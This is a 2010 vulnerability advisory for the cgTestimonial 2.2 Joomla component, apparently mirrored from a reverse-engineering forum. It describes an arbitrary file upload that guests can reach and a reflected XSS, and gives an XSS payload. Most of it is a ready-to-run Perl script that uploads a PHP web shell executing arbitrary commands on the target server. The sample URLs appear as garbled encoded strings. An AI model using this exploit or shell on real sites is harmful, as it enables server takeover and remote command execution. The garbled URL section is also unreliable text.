I. ABOUT THE APPLICATION
________________________
cg_Testimonial component is a tool for adding
testimonial by the user from frontend and managing and
publishing testimonials from backend.
This Joomla extension allows website user to submit a
testimonials form with several fields on one of your
site's page and enable adding testimonials by either
users or admin.
II. DESCRIPTION
_______________
Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.
III. ANALYSIS
_____________
Summary:
A) Multiple Arbitrary File Upload
B) XSS
A) Multiple Arbitrary File Upload
_________________________________
The usr_img parameter in cgtestimonial.php (frontend)
and in testimonial.php (admin, without checks) is not
properly sanitised. A check is executed on the content-
type HTTP field.
B) XSS
______
The url parameter in video.php is not properly sanitised
before being printed on screen.
IV. SAMPLE CODE
_______________
A) Multiple Arbitrary File Upload
682K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8G2j5#2)9J5k6i4y4S2L8s2k6S2N6r3!0J5k6h3k6J5k6i4y4@1j5g2)9J5k6h3&6W2N6q4)9J5c8W2m8G2b7#2)9J5k6r3y4Y4g2r3g2K6N6r3W2E0L8$3&6A6j5h3H3J5i4K6u0W2x3W2)9J5k6i4m8D9i4K6u0W2N6s2S2@1i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
B) XSS
0b0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3j5$3!0E0M7r3!0F1k6h3&6@1M7#2)9J5c8X3y4G2L8g2)9#2k6X3y4Y4N6r3g2K6N6r3W2E0L8$3&6A6j5h3I4Q4x3V1k6$3K9h3c8W2L8#2)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8l9`.`."><script>alert('xss');</script>
V. FIX
______
No fix.
################################ PoC-cgTestimonial2.2.pl ################################
#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email: salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#
use IO::Socket;
$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
"
6e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4S2L8s2k6S2N6r3!0J5k6h3k6J5k6i4y4@1j5g2)9J5k6h3&6W2N6q4)9#2b7$3&6Q4y4f1y4F1".
"Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";
$#ARGV == 1 || die $usage;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $stop = 0;
my $rand = "master".int(rand 150);
my $shell = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename = "evil.php";
my $code = "--AaB03x\r\n".
"Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
"Content-Type: image/jpeg\r\n".
"\r\n".
"$shell\r\n".
"--AaB03x--";
my $pkg = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
"Host: $host\r\n".
"Content-Type: multipart/form-data; boundary=AaB03x\r\n".
"Content-Length: " .length($code). "\r\n".
"\r\n".
$code;
my $socket = new IO::Socket::INET( Proto=> "tcp",
PeerAddr=> $host,
PeerPort=> "80"
) or die "\n[-] Unable to connect to $host\n\n";
print "\n[+] Connected\n";
print $socket $pkg;
$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
"Host: $host\r\n\r\n";
print $socket $pkg;
while ((my $rec = <$socket>) && $stop != 1) {
if($rec !=~ /302 Found/) {
$stop = 1;
}
}
if($stop != 1) {
print "[-] Shell not uploaded\n";
close($socket);
exit;
}
print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
"[+] Disconnected\n\n";
close($socket);
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
